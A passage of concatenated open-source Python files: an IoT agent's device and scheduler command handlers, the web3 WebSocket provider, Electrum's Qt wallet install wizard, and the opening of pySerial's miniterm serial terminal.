Returns: True if command was processed, False otherwise."""
error = None
try:
payload = message['payload']
info('ProcessDeviceCommand payload: {}'.format(payload))
if message['suffix'] == 'add':
result = self.sensorsClient.AddSensor(payload['sensorId'], payload['description'], payload['class'], payload['args'])
elif message['suffix'] == 'edit':
result = self.sensorsClient.EditSensor(payload['sensorId'], payload['description'], payload['class'], payload['args'])
elif message['suffix'] == 'delete':
result = self.sensorsClient.RemoveSensor(payload['sensorId'])
else:
error = 'Unknown device command: {}'.format(message['suffix'])
debug('ProcessDeviceCommand result: {}'.format(result))
if result is False:
error = 'Device command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error == None
def ProcessSchedulerCommand(self, message):
"""Process command to add/edit/remove a scheduled action
Returns: True if command was processed, False otherwise."""
error = None
try:
if message['suffix'] == 'add':
result = self.schedulerEngine.add_scheduled_event(message['payload'], True)
elif message['suffix'] == 'edit':
result = self.schedulerEngine.update_scheduled_event(message['payload'])
elif message['suffix'] == 'delete':
result = self.schedulerEngine.remove_scheduled_event(message['payload'])
elif message['suffix'] == 'get':
events = self.schedulerEngine.get_scheduled_events()
self.EnqueuePacket(events, cayennemqtt.JOBS_TOPIC)
else:
error = 'Unknown schedule command: {}'.format(message['suffix'])
debug('ProcessSchedulerCommand result: {}'.format(result))
if result is False:
error = 'Schedule command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error == None
def EnqueueCommandResponse(self, message, error):
"""Send response after processing a command message"""
if not 'cmdId' in message:
# If there is no command id we assume this is a scheduled command and don't send a response message.
return
debug('EnqueueCommandResponse error: {}'.format(error))
if error:
response = 'error,{}={}'.format(message['cmdId'], error)
else:
response = 'ok,{}'.format(message['cmdId'])
info(response)
self.EnqueuePacket(response, cayennemqtt.COMMAND_RESPONSE_TOPIC)
def EnqueuePacket(self, message, topic=cayennemqtt.DATA_TOPIC):
"""Enqueue a message packet to send to the server"""
packet = (topic, message)
self.writeQueue.put(packet)
def DequeuePacket(self):
"""Dequeue a message packet to send to the server"""
packet = (None, None)
try:
packet = self.writeQueue.get(False)
except Empty:
pass
return packet
# def SendHistoryData(self):
# """Enqueue a packet containing historical data to send to the server"""
# try:
# info('SendHistoryData start')
# history = History()
# history.Reset()
# while True:
# try:
# #If there is no acknowledgment after a minute we assume failure
# sendFailed = [key for key, item in self.sentHistoryData.items() if (item['Timestamp'] + 60) < time()]
# info('SendHistoryData previously SendFailed items: ' + str(sendFailed))
# for id in sendFailed:
# self.historySendFails += len(sendFailed)
# history.Sent(False, self.sentHistoryData[id]['HistoryData'])
# del self.sentHistoryData[id]
# historyData = history.GetHistoricalData()
# if historyData:
# data = {}
# info('SendHistoryData historyData: ' + str(historyData))
# data['MachineName'] = self.MachineId
# data['Timestamp'] = int(time())
# data['PacketType'] = PacketTypes.PT_HISTORY_DATA.value
# id = sha256(dumps(historyData).encode('utf8')).hexdigest()
# data['Id'] = id
# data['HistoryData'] = historyData
# info('Sending history data, id = {}'.format(id))
# debug('SendHistoryData historyData: ' + str(data))
# self.EnqueuePacket(data)
# #this will keep accumulating
# self.sentHistoryData[id] = data
# except Exception as ex:
# exception('SendHistoryData error' + str(ex))
# delay = 60
# if self.historySendFails > 2:
# delay = 120
# if self.historySendFails > 4:
# #Wait an hour if we keep getting send failures.
# delay = 3600
# self.historySendFails = 0
# sleep(delay)
# except Exception as ex:
# exception('SendHistoryData general exception: ' + str(ex))
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
import websockets
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop():
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint():
return os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546')
class PersistentWebSocket:
def __init__(self, endpoint_uri, loop, websocket_kwargs):
self.ws = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self):
if self.ws is None:
self.ws = await websockets.connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(self, exc_type, exc_val, exc_tb):
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("web3.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri=None,
websocket_kwargs=None,
websocket_timeout=DEFAULT_WEBSOCKET_TIMEOUT
):
self.endpoint_uri = endpoint_uri
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self):
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data):
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method, params):
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = _('')
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
